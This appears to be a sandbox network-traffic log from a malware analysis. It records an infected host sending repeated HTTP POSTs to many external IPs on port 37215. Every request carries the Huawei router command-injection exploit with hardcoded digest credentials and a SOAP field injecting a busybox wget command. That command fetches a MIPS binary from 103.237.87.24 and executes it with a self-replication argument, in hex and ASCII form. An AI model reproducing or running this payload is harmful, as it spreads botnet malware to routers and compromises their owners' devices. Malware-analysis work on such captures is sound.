                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1674192.168.2.135084441.243.237.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535214901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1675192.168.2.133394641.221.126.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535234928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1676192.168.2.1349898184.205.245.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535263062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1677192.168.2.1334900157.88.198.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535264015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1678192.168.2.134668441.176.187.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535280943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1679192.168.2.134057841.189.206.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535286903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1680192.168.2.135349841.45.230.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535360098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1681192.168.2.134167441.133.217.12537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535438061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1682192.168.2.1357916157.54.113.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535468102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1683192.168.2.1348754157.33.57.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.535476923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 